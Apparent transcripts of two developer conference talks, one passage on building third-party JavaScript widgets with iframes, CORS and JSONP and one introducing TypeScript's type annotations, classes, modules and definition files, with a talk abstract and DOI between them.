So any styles on the actual page won't affect the elements inside the sourceless iframe, and any styles you apply inside the iframe won't affect the page outside. So that way you get a sandbox and you can actually do some communication in and out of the iframe. So it's not as strict as normal iframe. So if you have a script running on the page, you can display two iframes and communicate back and forth between the script and the iframes or the iframes. So in order to create the sourceless iframe, you just do what we did earlier to create dynamic elements, you create an iframe element, set various properties, not setting the source, and then adding the iframe to the DOM. And after the iframe has been added to the DOM, you will get access to its content window document property, which is kind of the same as the document property on the whole page, only in the iframe. And then you can write HTML to the iframe with document right or iframe document right in this case. And then you can add style tags, script tags, dynamic inside iframe, which will then get loaded and executed all in the sandbox of the iframe. And as you have access to the document object, you can set variables and do stuff with objects inside the iframe from outside of the iframe. But also can the page. So it's not secure. So, for instance, Facebook wouldn't want to use that because then every page embedding a Facebook widget would be able to get access to the list of friends, for instance, listed inside the widget. For that, you want to use normal iframe. So, normal iframes, I guess some of you have used, where you just set the source to a page. And this will be an absolute reference to a page existing on your web server, not a relative reference, as in this example. And they give you a full separation between the page and your widget. The browsers enforce that the iframe and the contents of the iframe come from different server, so you won't be able to communicate between the page and the widget. You have some options to do that, and I'll get back to that. But in this case, the page won't be able to get any access to the stuff inside the iframe. So I have some examples here to do some cases. For instance, if you're going to make some interactive widget, this is something I made for a project. It was a widget for creating like multiple choice-style tests, where you had some dynamic editor, you could add new elements, enter the question and the answers, and reorder them and delete them and so on. And this was designed to be integrated into other web pages showing various tests. And they also had a similar player for actually solving the tests. We did this by rendering everything directly into the DOM. We didn't know about iframes at that stage, and yeah, we thought it would be easy. We just styled it. And we ended up styling it a lot. Because there are some... Well, there are a lot of styles here that are necessary for actually presenting this in a good way. And as soon as the page did something to margins or paddings or paragraphs or divs or fonts or whatever, they affected us. So we had to be really explicit in all the styling and say, yeah, we had to override all the weird properties you can think of in order to make sure this looked like we want. One of the reasons we did it inside DOM was so they could be able to override some of the styles. So, for instance, the colors and fonts, perhaps, there were a few things that we would be allowed to edit. 
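For reference, a minimal sketch of the sourceless-iframe technique described above: an iframe with no src acts as a style sandbox the page's CSS cannot reach. The markup and styles are placeholders.

```javascript
// Create a sourceless iframe and write the widget markup into it.
var frame = document.createElement('iframe');
frame.style.border = 'none';
frame.width = '300';
frame.height = '100';
document.body.appendChild(frame); // must be in the DOM before we can write to it

var frameDoc = frame.contentWindow.document;
frameDoc.open();
frameDoc.write(
  '<!DOCTYPE html><html><head>' +
  '<style>p { font-family: sans-serif; color: #333; }</style>' +
  '</head><body><p>Widget content, unaffected by page styles</p></body></html>'
);
frameDoc.close();
```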
If I were to do this again, I would probably do it either as a source with an iframe or maybe just an iframe. Because of those handboxing, I would get with the styles. The styles were hard to do. If you want to do something like this with an iframe and you want to use some of the styles on the page, for instance, the background color, then you could, with your JavaScript on the page, try to extract out the font, maybe, or the background color and then pass it into the iframe so you can set the same properties inside the iframe. Another example is embedding, for instance, a YouTube video that you don't see there. But you have seen it on a lot of pages, just the big window with the video inside. The best thing there is to use something like an iframe. If you go to YouTube and you click share, you can get the HTML code for embedding an iframe and just put that into your page. And they could, instead, have used some, or they could have provided some third-party JavaScript with some API, like embed video with the code and it would add the iframe tag to your HTML. And iframes are good for something like videos or something where all they do is communicating with the server they're loaded from instead of communicating with your page. So you have to consider the communication patterns of the application. Will the widget communicate with your page or other widgets on the page? Then normal iframes might not be a good solution. But if they communicate mostly directly with the server they're loaded from, iframes will be good. And also one good thing about iframes is that the contents of the iframe is rendered by the server they're loaded from. So instead of having to create all the DOM elements dynamically using your JavaScript, they can just be rendered on the server directly. And that creates some nice separation and it's easier to create and easier to test. So you've got to remember that iframes are not really that bad. I think iframes have bad reputation. Probably because they came from Internet Explorer. But just like XML HTTP requests, iframes in XML HTTP requests are actually pretty good things we've got from Internet Explorer. One problem you can get with iframes is if you want to render something outside of frame, either you display some pop-up or tooltip, then you're going to get a problem. Because iframes can be considered as a window into the other web server and you can't really display anything outside the border of the window. So if you need to do that you can solve it by rendering the tooltip or the pop-up from the script running on the page instead. Or perhaps creating several iframes and combining them in weird ways. But you've got to think about performance if you're going to create several iframes. If you are making a lot of different elements on the page, then iframes might not be the best idea. It will give you a performance impact. And especially compared to just rendering plain DOM elements, they're quite slow. And inheriting styles, I mentioned. You can do it with iframes, but it's a bit difficult because you have to try to find out which font will be used to use several levels of the DOM hierarchy. But it's possible. And then you have security. If you need absolute security, then normal iframes are a lot better than or they're actually the only option. But if security is not too big of a concern, then you can load things either in the DOM or view sourced as iframes. 
And when I say securities, then I think about is there a problem if the page actually gets access to the contents of the iframe? For instance, showing your friends on Facebook is not a good idea, but if they just say the discussion fields, then that's okay. So now we go into data and security. You got to be aware of the security boundaries in the browser. The browser always tries to make sure that your data won't leak anywhere, of course. And everything in the browser is designed so when you make a request to another website, when you do a get JSON with jQuery, your cookies can get sent. And if, for instance, a page were able to just do a get to your Facebook friend page and your cookie was sent along with it and the data returned to the page, that would be really bad. So the browsers do enforce security boundaries between servers. And then you're creating a third-party JavaScript. The script and the data for the JavaScript is most likely located on a different domain and the same with the data. So you're going to encounter these security problems. Luckily, loading scripts and images are easy, but data is not. So you can start to use just whatever you're using, like jQuery, get JSON or Angular, or HTTP for loading the data. And then we have to do some tricks in order to actually allow the request to complete. So just something more about the same origin policy in browsers. The browsers have implemented, yeah, all browsers have implemented the same origin policy, even though not in the same way. And the point is that it's there to prevent XML HTTP requests to different sites using the users own credentials. So the requirement here is when you want to make the request, it's important that it's the same protocol as the pages that you're on, HTTP and HDS. And it has to be the same host as the page, including the subdomain. And it also has to be the same port as the page. And make note here that script tags and images, as mentioned, are exempt from the same origin policy. Luckily. So that's why we're allowed to load jQuery from CDN and so on. So in order to get past the same origin policy, we need to use something called cross-origin resource sharing that W3C has created. And this is for allowing requests across different origins than protocols, and ports, by using a pre-flight options request. So every time you then make a get request to the server, the browser first sends a pre-flight request, which is an HTTP option. And then the server responds with which methods and which headers are allowed for the actual response. So the server can, for instance, say, do not send cookies or do not do deletes. And here we have implementations in all browsers, but they vary a bit. So here's an overview of the support in the browsers. And as you see, all the major browsers support it. But be aware of that Internet Explorer 8 and 9. Only support get and post using course. And also you get problems if you want to use custom headers or send cookies. So authentication is a big problem here. So then you've got to do something like putting authentication tokens in the URLs or something. And you also need to be aware of that if your users are using Internet Explorer, you're going to encounter the Internet Explorer security sounds, if you're unlucky. And the problem here is you might have done everything correct with course and things are working in all browsers. Things work perfectly for you and in your local environment. And then some system administrator might have added your domain as a trusted site. 
And then web pages on the Internet won't be able to make requests to your trusted site. So then you won't be able to get data. And if this is set, there's nothing you really can do to get around it unless you've actually talked to the IT administrator and get them to remove your site from trusted sites. And this might be a big problem. So one thing you can do in order to load data from the server is to use JSON with padding, JSONP. JSONP is actually quite good workaround for same origin policy. It just works. It's very simple. It only works for get requests. So if you just want to fetch some simple data to display on the site and you are not going to include anything like any user secrets, for instance, Facebook, France, then JSONP is very good. So JSONP is actually just a script tag. So it's just a JavaScript file. It's not a JSON file. So you refer to JavaScript file with the callback. And then when you receive the JavaScript file, your JSON is returned to the page wrapped in the callback. So as soon as the JavaScript is parsed and executed, the callback will get called with the data you requested. And this works quite nice using jQuery. So for instance, if you do a get JSON and it notices there's a callback parameter in the URL, then jQuery will auto generate the callbacks for you and the API is just the same as using get JSON normally. And if you want to send data, you can do it through image tags. Google Analytics, for example, uses this in order to send analytics data. So just by creating a new image and setting the source, this request will be made to the server. And then you can add some parameters. Just be aware of the maximum length of the URL in various browsers and various web servers. So this is quite nice for just fire and forget, perfect for logging and logging statistics. For instance, this is a recounter. It would be perfect just implementing using this just to send data, not caring about the response. And then the web server can just return a 200 OK without no image, of course. And nothing is added to the DOM here. And then we have iframe messaging. Iframe, as I mentioned before, are kind of like windows or tunnels into a different server. And the nice thing is that everything running inside that iframe can communicate freely with the server. And there are some things you can do to actually communicate with the iframe as well. So iframe supports simple messaging. And it's quite hard. But, yeah, it's quite useful when you get it working. Because then it can work across all browsers and it works quite nice. And then you can tunnel jQuery and other messaging libraries through the iframe. So some suggestions in order to do communication is to consider course first. As it's standard, it's getting wider and wider support. And all newer browsers, not caring IE8 and IE9, support it quite well. All HTTP methods and everything work. You just have to create something to return that options response. And the browsers will just handle it transparently. You don't have to request the options response yourself. If you're only getting there, I recommend you just use JCP. It works. It works well across all browsers. Just be careful not to include anything user personal or anything in that response. Because every web page can just include a reference to mydata.js with a callback. And the user's cookies will get sent along with that request and you'll get a response with, for instance, personal user information. And iframe messaging works well when you get it working. 
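As a rough illustration of the two simplest options mentioned above, JSONP for reading data and an image beacon for fire-and-forget writes, here is a sketch. The endpoints, parameter names and callback names are invented.

```javascript
// JSONP: the server wraps the JSON response in a call to the named callback.
function loadVisitorCount() {
  window.onVisitorCount = function (data) {        // one well-known global callback
    document.getElementById('visitor-count').textContent = data.count;
  };
  var s = document.createElement('script');
  s.src = 'https://api.example.com/visitors?callback=onVisitorCount';
  document.getElementsByTagName('head')[0].appendChild(s);
}

// Image beacon: good for sending data when the response doesn't matter.
function reportPageView(pageId) {
  var img = new Image();
  img.src = 'https://api.example.com/track.gif?page=' + encodeURIComponent(pageId);
}
```

For real two-way communication, though, the iframe-messaging approach mentioned above is still the most capable option.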
Then it's, yeah, you can just set it up, get it working and not care about it anymore. So take a look at ECXDM, which is a good library that abstracts away all the other things about iframe messaging. As you got to do various tricks in various browsers in order to get it to work. In IE7, I think it uses flash in order to do some tricks to get some messages passed into the iframe. So providing an API, this is actually just a single slide. Because I have talked about most of what you need to do in order to provide an API. You just got to get the script on the page, as I already talked about. You can forget about DOM because you're only going to provide some JavaScript objects registered in the global namespace. And, yeah, just make sure not to expose a lot of private properties and private objects inside the global namespace because people might start to use your privates instead of just to define public API. And of course, your API needs to be stable at the various or at certain degree, depending on what you need to do. So, yeah, that's not really much more to say here. So just a summary. You got to get your loading loader really perfect to begin with. Get it right and then start using it. And as soon as you got that loader script running and loaded asynchronously, you can keep modifying it to fit your needs. Maybe loading parts of your scripts in parallel and, yeah, doing various tricks with the page. You got to be careful when you're doing changes to the DOM because you don't want to break the pages. You'll make your customers mad. And when you're going to get data or send data to the server, I can't really say anything else than good luck. It's quite hard to get it working perfectly, but it won't work. So hopefully it stays working. So some suggested reading. I got inspired to do this talk after I read this book. We used it a lot when doing some of the scripts we were doing at my client. And this goes through all the points I talked about in this presentation in addition to a lot more. And there's quite some finer details on authentication and cookies and eye frames that varies a lot between the browsers. So they have very good tables and overview of what works where and when. So any questions? Yeah. Well, one, well, require.js does about the same. It adds a script tag to the page with the script you're requiring. The problem is you first have to require.js. So you've got to require.js down to the page synchronously first before you can start loading scripts asynchronously. So you still get the same problem with getting the first script on the page asynchronously. Yeah, up there. One question. Is async loading scripts work with the script that do DOM manipulation like knockout in Angular? Yeah, I think that should work. I'm not quite sure. You probably just want to make sure you're doing the DOM manipulation in the correct stages of DOM rendering. For instance, if you have loaded and run before document ready has fired or after document ready has fired, just make sure the elements that you actually need are going to bind to existing the DOM. That shouldn't be a problem. Yeah. I guess that's it. Thank you. Thank you.
|
When building a web page composed of different parts, the different parts can be combined at different stages of page rendering. Everything can either be loaded on the server before being returned to the client, or the client might receive the minimum amount of data immediately before loading individual components using JavaScript. The first way might be more straightforward, but the latter both allows for looser coupling between services and allows better user interaction with the various page components. There are many scenarios where third-party JavaScript provides a good separation of concerns. You might be building a site with several secondary features like comment fields, feedback dialogs or shared toolbars, or you might be providing widgets or an API for other websites to consume. All of these cases are good candidates for writing so-called third-party JavaScript applications. When writing JavaScript that should run on known or unknown sites there are a lot of considerations to take into account. Should the application provide a near-seamless experience, giving the impression that the components are a native part of the parent page - like for instance a login widget - or should the widget give a branded and more isolated impression like the Facebook widget? Can the site be trusted? Should the web site or the users be allowed to interact with the application? Depending on the answers there are a number of different approaches, ranging from tight integration to sandboxed iframes. In this talk I will go into detail on the following subjects: - Loading and initializing the JavaScript application, - Running JavaScript and rendering HTML in unknown environments, - The balance between integration and sandboxing, - Communicating with other sites and components, - Security, and how to work around browser constraints
|
10.5446/51523 (DOI)
|
So, welcome everyone. I'm glad to see that so many actually showed up here. I had some competition at this time slot with Uncle Bob and another JavaScript talk, so I'm actually quite pleased with how many have showed up. So, my name is Torsen Nikolajsen. I work as a senior consultant at Bekk Consulting here in Oslo. I've been doing web development for many years now and I've been doing a lot of JavaScript the last few years. If you want to contact me, you can reach me at Twitter, LinkedIn or Google Plus using my username here. So, I know why you guys are here. Like I said, you have actually chosen this track now. There's a lot of other interesting things. So, I guess all of you are actually motivated to learn TypeScript today. And I won't spend that much time motivating you and explaining why we need TypeScript. I'll just mention it shortly. And an interesting thing was that during the earlier sessions here, Don Syme, when he was talking about F#, mentioned JavaScript. And I'll come back to that a bit later. So, I was actually going to do a pun here with walking you down memory lane, just explaining all the troubles that we have had with JavaScript over the years. And actually, I also just wanted to show you this drawing, which I love, just to tell you about the browser wars and how we have come to a standardized way of doing web development right now. So, let's just take a quick look back at how we did JavaScript development when it started booming. So - I have to say this before we start - I really like JavaScript, so I'm not going to trash talk JavaScript. But if you look back, many developers neglected JavaScript as a programming language. They didn't consider it a true programming language. So, actually, people wrote jQuery, not JavaScript. And many of the apps they generated were just one huge file called script.js, which was unmaintainable, and only one guy knew how to do stuff in it. It was the spaghetti code. But we have gotten a lot better the recent years. There has been a lot of focus on JavaScript, and it has established its status as a real programming language now. And we actually manage to build quite large applications today. Just have a look at Gmail, Facebook, Trello, and Cloud9 IDE. Cloud9 is actually almost entirely written in JavaScript, both frontend and backend. And that's impressive. But in order to build these big applications, we require tools that lie outside JavaScript. We have to have script managers, or dependency tools, like Require.js. And in order to build this in a smooth fashion, we require tools like Grunt, or we have to use something like Maven or MSBuild, with extra steps. We have to do a lot of extra work. And once we have managed to build a quite large application, if we don't follow all the good design practices on how to do proper JavaScript, and we try to fix one thing, it all just falls apart. And the reason for that is that there is little glue that holds JavaScript apps together right now. The only glue that is common is unit tests and integration tests of the JavaScript code. And you guys know that we aren't doing enough of that. So when we write JavaScript, we can't easily refactor code or do stuff like that to it. And the reason is twofold. Again, we developers tend to neglect JavaScript as a language, and we also don't do all the good practices. And JavaScript as a language doesn't have that many means of encapsulating and structuring your code.
You can use closures and stuff like that to simulate that you have some scoping. But that doesn't work really well at large scale, in my opinion. So I'm going to tell you today how TypeScript can help to mitigate some of these issues. So today we'll be looking at what TypeScript is. We'll dive right into some features, and I'll be doing a lot of live coding throughout the session. And we'll be looking at the ecosystem that TypeScript exists in, and I'll do a recap and give you my final thoughts on what is happening right now with TypeScript and what is probably going to happen in the near future. So let's just check out what TypeScript is on a high level. It is technically a superset of JavaScript. That means that it actually has all the features and syntax of JavaScript, but it just adds more features on top of this. So you can actually write JavaScript inside of TypeScript. It will still compile. And it is one of those languages that compile down to JavaScript, so you don't need a browser plugin like Google Dart actually has; Dart requires you to either compile to JavaScript or run it in the Dart VM. TypeScript compiles down to good JavaScript code. And you can compile it using the official Node package, or you can actually use a Visual Studio plugin which makes this really smooth, in Visual Studio at least. Like many other things in the JavaScript ecosystem, TypeScript is also open source. All the code is actually available on CodePlex, and you can follow the development, track the issues, and actually talk to the developers. And it's worth noticing that this is actually a Microsoft initiative to write TypeScript. And that brings us over to this cheery looking guy, Anders Hejlsberg. He's most notably known as the lead architect for C sharp. And I think that lends credibility, as he is actually the designer of TypeScript as well. You can see that his previous work on C sharp influences the way that TypeScript works. So if you like C sharp, you will see some familiar elements in TypeScript. Another brilliant decision of the team that is creating TypeScript is to align it with the upcoming ECMAScript 6 standard. If you don't know what ECMAScript is, the simplest way to put it is that it is the standard for JavaScript. You can think of it as that. And the next version of ECMAScript, version 6, defines how classes and modules should work, and some other language constructs. So by aligning with this, that means that TypeScript will look very similar to what JavaScript will look like in the future. Another benefit is that TypeScript has already implemented some of these features that are still a draft now. And that means that you can actually use classes and modules now instead of waiting for JavaScript to come along and add that. So let's look at some of the new features in TypeScript. We will be looking into type annotations, classes, interfaces, modules, arrow functions, and a few more during this session. So type annotations are probably one of the most unique features in TypeScript. They work pretty much like you expect them to work in other languages. And you can apply types to objects, parameters, fields, return values and some other things in the language. You have some primitive types in TypeScript: there's string and number, and note that you can't separate between integer and float numbers; it's the same number type that you have in JavaScript, which is a float. And you have boolean, and you have the any type. The any type is the default fallback type.
So if you don't specify a type on a variable, then it will be of type any. You can assign anything to it. And you have something called void. You have that in C sharp, of course, but JavaScript does not have that concept. So in TypeScript, you can explicitly say that this function does not return a value by using void, as you would do in C sharp. Another brilliant thing about TypeScript is that it gives you the option to choose whether you want to use types or not. And this has two advantages. You can actually migrate your existing JavaScript code base over to TypeScript by applying types step by step as you go along. And another thing is that you can use types where you like. This is one of the things that Don Syme talked about earlier with F sharp. You have statically typed languages and dynamically typed languages, and you have something in between. And that's where TypeScript is right now. You can choose what you want. So you get the best of both worlds. So let's look at some syntax. This is a classic thing you would see in JavaScript. And since I haven't annotated it with a type, the type is any here. That means I can assign a number to it. I can assign a string. And I can assign an object to it. No problem. I can also do static typing. Here I say that this variable should be a string. So if I try to assign a number to it, the compiler will give me a warning here. And TypeScript also has type inference. That means if I assign a value to the variable at the same time as I declare it, like so, it will infer that author is a string. And therefore, if I later try to assign a number to it, it will complain because it has inferred a type. So I'll just show a quick demo of what this can look like. So if I were to create a function called add contact, and I say I want a name and a phone. So this is what you would have in classic JavaScript. So if I were to call this, hmm? We don't see anything. Oh, sorry. The screen switch didn't work. All right. This should work. All right. So what you're seeing now is classic. This, again, looks like JavaScript. And if I were to treat this as a black box, if I didn't know what this function does, I would call it like so, and I'd see that here we have two parameters. I don't know the type of them. So if I didn't know better, I'd guess that the first parameter is the name. Okay. Hmm. Probably, if it has a name. That's true. And the second parameter is the phone. Yes, probably a number. So I don't know anything about how this is expected to work. So with TypeScript, I can give types to this. So you see, I can annotate this to be a string, and then I will get a squiggly line here; now the compiler is complaining. Here it says that this input does not match the signature. So in order to fix this, I have to make this a string, and it will work. And I can continue by adding a number type, since the phone is a number, and I'll get the same error here. And to fix that, I will have to pass a number here. So you see here, the compiler actually prevents me from making silly mistakes. And I can also annotate the return value from this function to be a string. Again, the compiler will complain here because the function is not returning anything. So I can return something here, and it will go away. So let's look at the compiled code here. This is the TypeScript, and here we have the JavaScript code.
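Roughly, the demo above boils down to something like the following sketch; the function body and the values passed in are just illustrative.

```typescript
// Roughly what the demo above boils down to (the body is just illustrative).
function addContact(name: string, phone: number): string {
    return "Added " + name + " (" + phone + ")";
}

addContact("Ada", 12345678);      // OK
// addContact(12345678, "Ada");   // compile error: arguments don't match the signature

var author = "Ada";               // inferred as string
// author = 42;                   // compile error: number is not assignable to string
```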
So again, it's, if I just center this, the code looks really similar, just without types here. And this last line here is just source mapping. That's used for debugging. So you can map a line in TypeScript over to a line in JavaScript. So let's go back to the presentation. Does this work? Yeah. Awesome. Great. Just going to go quickly through interfaces. Interfaces can, you probably know what they can be used to, but declaring them looks like so. And this, the only thing that's special here is that you have a way to say that this is optional. You can choose to not include this in the type that implements this interface. So common usage for interfaces is to have our class implement certain members, like a function of fields. And you can also ensure that if you have a parameter that you pass your function, you can ensure that this has some characteristic by using interfaces. And we're showing some demos of interfaces along with other code. So classes is, again, this is what's been proposed with ECMAScript 6. Classes are mostly like in other languages, but you should think of it as a container in JavaScript. So you can have constructors in them. You can have fields, functions. And if you are feeling really brave, you can actually use properties, which is something that's not really good, really well-supported in older browsers. But JavaScript has them. And you have this get set syntax for local fields. You actually have wrap them, get some extra encapsulation. So I'm just going to do a demo of classes and how they work. So in this example, I'm going to make, thank you, I'm going to forget that, this worked better than last time. So I want to create a class called superhero, like so. And you see on the right side here, it's already compiled that into JavaScript code. So you see that actually creates quite sane, readable JavaScript code. This is the way I would have done this if I wrote it in JavaScript. And now I'm going to create the constructor here. And in this constructor, I'm going to pass in a parameter called name. I want that to be of type string. So I want to assign that to a local field called name. And here the compiler will complain because this class does not have that field. So I have to declare it in the class. So the simplest way to do that is just like so. So now I have a local field. And this is okay. This is the way you would have done it. But there's a shorthand also for doing exactly the same thing. I can remove this too. And I can add public in front of here. And it compiles to the same code and works the same way. So that's just a shorthand for creating local fields. This can get messy if you don't use it correctly. So the next thing I want to do is create an interface. So I'm going to create an interface called I have superpowers. And that is going to force this implementation to have a method called get superpower. And I want that to want to return string. So that's my interface. And then I can say that this implements, this is things you can't do in JavaScript right now. So you can't drive the design or enforce the design in your code right now in JavaScript. You have to use other tools for that. So I say I have superpowers. And now the compiler will complain again because, and it gives really good error messages here. So if you see here, they says that the type super is missing the property get superpowers. So it's really helpful here. So all I have to do is implement that is just say get super power. 
And I have to implement this one and make sure that it returns a string. So clean code is my superpower. So that works now. And also another thing, if I had returned the wrong type here, notice that I haven't specified here which type this one returns. It's inferred and it therefore matches with the interface. So if I had returned a number here instead, I would actually get the compiler error. So it's a bit more discrete here. But here it says that it does not match. Doesn't matter what it says. So the next thing I want to show you is concept of accessibility. So this is public by default. I can actually add a private method in this code here. So get secret power. And this one will not be visible from the outside. So if I declare I have a hero, superhero, I can see that this object has get superpower and names, public fields. But I don't see this one because that's not publicly available in this type. But it was interesting here. In the compile code, you'll actually see that it's being defined as a regular function on the object. This is because JavaScript don't have a notion of public and private accessibility. So the last thing I want to show you in the classes is sub-classing. So I can do a super-duper hero which extends a superhero. And here I can also make a constructor. And this constructor I'll choose to take in a name and keep it like so. And when you do constructors in TypeScript or in sub-classes, you always have to call the super, use the super key word to call the constructor in the parent class. This is an thing that's enforced. So now I have made a sub-class of this. Yes. So you see that this is similar concepts that we already have in other languages. And again, doing this in JavaScript would have required you to write something really similar to what you're seeing here. It's not formatted as neatly, but you would have to do the same things here in JavaScript. So let's go back to the presentation. Like so. All right. The next thing I want to show is arrow functions. Arrow functions is simply just a short hand for writing methods. There's one special behavior in TypeScript, and that is that it binds to this keyword lexical. I will show you what that means by demo. But first, I just want to show the syntax of how this looks. So this compiles down to this JavaScript code. And again, you see here the input parameters goes here, and then you have a method body. And maybe this example is a bit clearer. But here you have some code that compiles down to this. You assign the function to a variable called sign, and then you pass in an input parameter, and you have a method body. So this is all that this syntax does. And the main application for this is using, for instance, working with callbacks in the user interface when a user clicks a button or when they get WebSocket data or someone has triggered an event. And it's also really useful for working with code that has functional style. So again, a demo. Hope you like demos, because I have a lot of them. All right. So in this demo, I have created this web page where I have a button here called demo button. Thank you very much for noticing. This is something I should have prepared better. All right. Now you see. In this demo, I have a web page here where I have a demo button on the web page, which I will use later. So I'll create a new class called button handler, like so. In this class, I want to have a constructor that takes in the HTML button. 
And the funny thing here is that in this demo, I'm actually going to show you quite a few things about TypeScript. So in this, you have the DOM API that's in JavaScript already. And TypeScript has put strong typing on top of that. So I actually have an HTMLButtonElement type that comes directly from the DOM. So I can say that I want a DOM button of that type in my constructor. And I can actually just do like so. Then I have assigned it to a public field. And I also want this class to have a private field. So it's a secret. Shh. Don't tell anyone. And what I'm going to show you now is a very classic example of something that's a bit of a hassle to do in JavaScript. So on the onclick event on the button, I want to trigger a callback. So I'm creating a function here that will be the callback. And the interesting thing here is it knows that this type is a mouse event, because I'm using the strongly typed HTMLButtonElement. This is a quite nice feature that you get by using this. So what I want to show you: I want to alert this.secret. Like so. And in order for this to work, I'm going to show you another thing here. I want to again have this DOM button as an HTML button. So I want to declare a variable here. Then I want to assign it on the line here. Document.getElementById, classic, no jQuery. And I call it the demo button. Like so. And now I see the compiler complains here. And the reason for that is that I get an HTMLElement back from this method, and I'm trying to assign it to something that's an HTMLButtonElement. So now I can actually show you casting in TypeScript. And you do that by using angled brackets like so. HTMLButtonElement inherits from HTMLElement, so that's what I need to do to get this to compile. So now I can actually call the button handler constructor and pass in my button like so. And this compiles. Now I can open this web page. I hope I saved it here. So what have I done? Like so. I can open this web page in my browser. And yes, I'll probably do that. So if I push this button now, I expect to see shh, which was the local field. But I get undefined. And this is a regular problem in JavaScript. And this is expected, by the way. And the reason for this is that when you are doing callbacks in JavaScript like this, the this keyword here actually points to the element that triggered it. So it actually refers to the DOM button here in this context. And the easiest way to fix this is by using an arrow function. What the arrow function does, you see there was really not much change here in the code, but the arrow function now binds the this keyword to the context. And the context here is that it's within a class. So this now points to the class. So if I run the same code again, it's been compiled in the background, I actually get the string that I expected to see here. So I think, yeah, that was what I wanted to show in this demo. So, next one. So modules. Another great way of handling encapsulation in TypeScript. They are similar to namespaces in C sharp and packages in Java. And again, I think this is one of the issues in JavaScript right now. And they have addressed it in ECMAScript 6 by adding modules there. But you can right now have encapsulation in your code. And modules are really easy to import between code. So it actually makes it easy to reuse code. And you can compile these modules to either CommonJS or AMD.
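Before going further with modules, here is a condensed sketch of the button-handler demo above. The element id is made up and the class is trimmed down to the essentials; the point is how the arrow function keeps this bound to the instance.

```typescript
// Condensed version of the demo above: the arrow function binds `this` lexically,
// so it still refers to the ButtonHandler instance inside the click callback.
class ButtonHandler {
    private secret = "shh";

    constructor(public domButton: HTMLButtonElement) {
        domButton.onclick = (e: MouseEvent) => {
            alert(this.secret);   // "shh"; with a plain function, `this` would be the button
        };
    }
}

var button = <HTMLButtonElement> document.getElementById("demoButton");
new ButtonHandler(button);
```

With that, back to modules and the CommonJS and AMD output formats.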
And if you don't know what that is, the best way to learn about that is actually talk tomorrow that will be about required JS, which implements the AMD pattern. But it's just a JavaScript or node way of actually getting source files between or runtime in an asynchronously way. So the syntax for creating modules is like you expect. You can have classes, functions and variables inside a module. And in order for them to be accessible outside a module, you have to prefix them with the export keyword. That means that they are publicly available. And if you don't have the keyword in front of them, they will be internal modules. So you're going to have helper classes and helper functional local variables inside that and not exposed. So it's a great feature. In real world, we are probably going to reference a lot of modules in our projects. So there's two things here. There's something I call internal modules. That is, if you don't have a big project and you are manually setting the script blocks in the header in your HTML file, you can use internal modules. So all you have to do then is just in top of each type script file, you have to add a comment like so to tell it that, really, this file and use the types that are inside this one. The downside by using internal modules is that you have to, if the application grows, you have to keep the sequence of the scripts correctly. So you have to ensure that all the scripts are loaded in the correct sequence up front. This doesn't scale very well. But external modules is probably more scalable. And it is when you use, when you use like a script loader, like require.js to handle this. I will show you in a demo how this actually works. So I want to be showing a lot of the basic things. I actually go right into the advanced thing. And I have prepared a demo here so I can actually just talk you through it. So just switch over to duplicate. I remembered it this time. All right. So I prepared a web page here which is using require.js. I already don't know this script. So the only thing that require.js knows about is that when require.js is loaded, it is going to load a file called main.js. That's the first thing that require is going to do. So in my TypeScript file, I have told it to look for, again, this is the only place I have to declare TypeScript or make the application know about TypeScript. So what I'm doing here is that I'm actually saying, okay, you need to read the types that's inside this definition file. I'll come back to that in the next demo. And that is the only place that you need to, again, know of require. So what you do here is that use require syntax. What this means is that when you load the application, look for a file called bootstrapper.js, load that entire module, and when that module is loaded, it will then be passed into this function as a parameter. And on that object, I have created a function called run app, which I will show you now. So the only thing this one has, it exports a function called run app. You see, I don't have to wrap this inside a module in this case because I'm using the external thing. And the interesting thing here is that inside here, you don't see any require.js syntax. You actually see that I import the module here. This actually looks for a file called view.ts. So I have a dependency to that module. So if I go into this module, I see that I expose a class called registration view. And again, I see that I have another dependency here. Again, there's no require.js syntax. This is typescript syntax. 
And if I go into the utils, I see that this is kind of a leaf node. So you see that I have nested dependencies here. And if I were to handle that within the script block here, I had to know which dependency needed which location, at which time. So you have to get the correct sequence. But if I'm really, really lucky now, this should work in the browser. And I can show you what happens. So like so. Yes. So let's check to console. Nope. And I know what's wrong here. There's an issue with loading. Awesome. There it goes. So what it does now is that when I load the page, require.js takes over and figures out which scripts need to be loaded first. So the only two files that are loaded first here are require.js and main. Then it knows that busstrapper, review and utils has to be loaded in sequence. And it handles all of this for me. So I don't have to know about that. And that's a great feature for doing large-scale applications because then you actually don't have to think about how the scripts are loaded. I think that's one of the key elements to getting scalability. All right. So. So. All right. I have something to say about parameters. I'm just going to show you some slides here. There's some really useful new syntactical sugar that makes it easy to write flexible functions. So you have default parameters, which means that you can set the default value. So you can either call it like so or pass along a boolean value here. This is really useful. And you also have optional parameters like I showed you earlier. So you can actually choose to pass in options or not. So you can call this function in several ways. And you also have something called rest parameters. This is also a part of ECMAScript 6, this thing, which you can compare to var args in C sharp. So what's going to happen if you pass in, you can have an endless number of parameters here. But you get the first one as the winner and the rest will actually just be in an array called the rest here because that's what I called it. And we have something that I think is one of the coolest features of TypeScript. It's type definition files. And before we show you them, I have to explain what ambient declaration is. It's a way of saying to TypeScript that, chill, I know that I get this variable from somewhere outside TypeScript. Typically, if you have loaded TypeScript in the script tag earlier. So just chill. I know what I'm doing. That's what you're saying to TypeScript. And it also, if you do use the clear word, it will actually not include this variable assignment in the compile code. So you just omit it totally. And there's something called type definition file. These are just a single file that defines all the signatures of the library that you're using or dependent on. For instance, if you're using jquery.js, TypeScript won't know about the types that it has. But by using definition files, you can actually get strong typing on jquery. So you can actually use it in a strong manner in the TypeScript files. This actually means that you get all the completion help and intelligence on jquery. That's really helpful. And the way this works is that you use this reference thing I showed you earlier in the top. And all of these type definition files does add an ambient declaration to say that this variable exists somewhere in the code. And there's a project, or a GitHub repository called definitively typed, which is a great repository for finding all kinds of definition files. So you'll probably find the framework you're using. 
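A compact sketch of the three parameter flavours mentioned above; the function names are made up for illustration:

```typescript
// Default parameter: callers may omit `verbose`, and it falls back to false.
function log(message: string, verbose = false): void {
    console.log(verbose ? "[verbose] " + message : message);
}

// Optional parameter: `options` can simply be left out by the caller.
function connect(url: string, options?: { timeout: number }): void {
    var timeout = options ? options.timeout : 5000;
    console.log("connecting to " + url + " with timeout " + timeout);
}

// Rest parameter: the first argument gets its own name, the rest arrive
// in an array, much like a params array in C sharp.
function announceWinner(winner: string, ...runnersUp: string[]): void {
    console.log(winner + " wins over " + runnersUp.length + " others");
}

log("starting up");
connect("https://example.org");
announceWinner("Alice", "Bob", "Carol");
```

And on the definition-file side, DefinitelyTyped mentioned above already covers most of the common libraries.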
